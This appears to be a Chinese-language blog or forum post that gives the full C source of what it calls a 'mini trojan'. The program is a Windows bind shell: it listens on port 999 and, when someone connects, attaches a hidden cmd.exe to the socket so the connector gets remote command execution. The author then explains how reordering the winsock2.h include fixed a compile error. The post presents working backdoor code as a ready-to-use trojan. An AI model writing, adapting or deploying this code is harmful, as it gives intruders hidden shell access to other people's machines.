这是个mini木马,要正向连接,通过telnet或nc连接就好。
#pragma comment(lib,"ws2_32.lib")
#include <winsock2.h>
#include <windows.h>
#define MasterPort 999 //定义监听端口999
main()
{
WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
char szCMDPath[255];
//分配内存资源,初始化数据
ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
ZeroMemory(&WSADa,sizeof(WSADATA));
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa);
//设置本地信息和绑定协议,建立Socket
SockAddrIn.sin_family=AF_INET;
SockAddrIn.sin_addr.s_addr=INADDR_ANY;
SockAddrIn.sin_port=htons(MasterPort);
CSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
//设置绑定端口999:
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
//设置服务器端监听端口
listen(CSocket,1);
iAddrSize=sizeof(SockAddrIn);
//开始连接远程服务器,并设置隐藏窗口结构体
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
StartupInfo.cb=sizeof(STARTUPINFO);
StartupInfo.wShowWindow=SW_HIDE;
StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
StartupInfo.hStdInput=(HANDLE)SSocket;
StartupInfo.hStdOutput=(HANDLE)SSocket;
StartupInfo.hStdError=(HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
//关闭连接卸载ws2_32.dll
WSACleanup();
return 0;
}
在学习这段代码的时候,书上原来没有#include <winsock2.h>这句,我用的是vc++6.0sp6编译运行的,老是提示出错
error C2065: 'WSASocket' : undeclared identifier
就是这句 CSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);里面的出错。
从网上查了好久,说没有加#include <winsock2.h>这句,后来,我就加到#include <windows.h>这句后面了,结果出错更多了,有个网友说了一句有加载顺序的,要放在前面,就如那个成型的代码了,这样就运行通过了。很经典的一段代码。